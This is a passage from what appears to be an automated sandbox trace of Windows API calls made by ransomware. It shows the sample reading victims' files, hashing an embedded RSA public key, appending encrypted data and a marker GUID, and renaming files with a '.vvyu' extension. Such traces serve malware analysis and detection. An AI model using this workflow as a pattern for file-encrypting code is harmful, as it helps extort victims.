hHeap=0x6a0000) returned 1 [0183.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d40278 | out: hHeap=0x6a0000) returned 1 [0183.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d40490 | out: hHeap=0x6a0000) returned 1 [0183.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30e20 | out: hHeap=0x6a0000) returned 1 [0183.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d40068 | out: hHeap=0x6a0000) returned 1 [0183.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.562] WriteFile (in: hFile=0x584, lpBuffer=0x2d36670*, nNumberOfBytesToWrite=0x99e2, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d36670*, lpNumberOfBytesWritten=0x30ffb14*=0x99e2, lpOverlapped=0x0) returned 1 [0183.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.563] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x99e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.564] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d36670 [0183.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d36670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d36aa0 [0183.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.565] WriteFile (in: hFile=0x584, lpBuffer=0x2d36aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d36aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36aa0 | out: hHeap=0x6a0000) returned 1 [0183.565] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.565] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.565] CloseHandle (hObject=0x584) returned 1 [0183.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d36670 [0183.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.567] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\Ed-zOTKEEUdYISk.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\ed-zotkeeudyisk.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\Ed-zOTKEEUdYISk.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ed-zotkeeudyisk.mp4.vvyu")) returned 1 [0183.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.570] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.573] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498f2e00, ftCreationTime.dwHighDateTime=0x1d8a71d, ftLastAccessTime.dwLowDateTime=0xc6c33610, ftLastAccessTime.dwHighDateTime=0x1d8a73f, ftLastWriteTime.dwLowDateTime=0xc6c33610, ftLastWriteTime.dwHighDateTime=0x1d8a73f, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eOgdOPqhf.odp", cAlternateFileName="EOGDOP~1.ODP")) returned 1 [0183.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30e20 [0183.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30e20 | out: hHeap=0x6a0000) returned 1 [0183.574] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\eOgdOPqhf.odp") returned=".odp" [0183.574] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\eOgdOPqhf.odp" (normalized: "c:\\users\\keecfmwgj\\desktop\\eogdopqhf.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.574] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=44506) returned 1 [0183.574] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.577] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xadb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.577] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.580] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.580] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xadda, lpOverlapped=0x0) returned 1 [0183.581] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.581] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.581] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.581] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.582] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.582] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.582] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.582] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.582] GetLastError () returned 0x0 [0183.582] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.582] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.583] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.583] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.583] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xade0) returned 0x2d36670 [0183.583] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30e20 [0183.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30e68 [0183.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.585] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d41458 [0183.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41678 [0183.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41678 | out: hHeap=0x6a0000) returned 1 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e780 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e768 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41458 | out: hHeap=0x6a0000) returned 1 [0183.588] GetCurrentThreadId () returned 0x264 [0183.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce410 [0183.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.589] GetCurrentThreadId () returned 0x264 [0183.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e780 [0183.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7e0 [0183.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7f8 [0183.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e798 [0183.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: 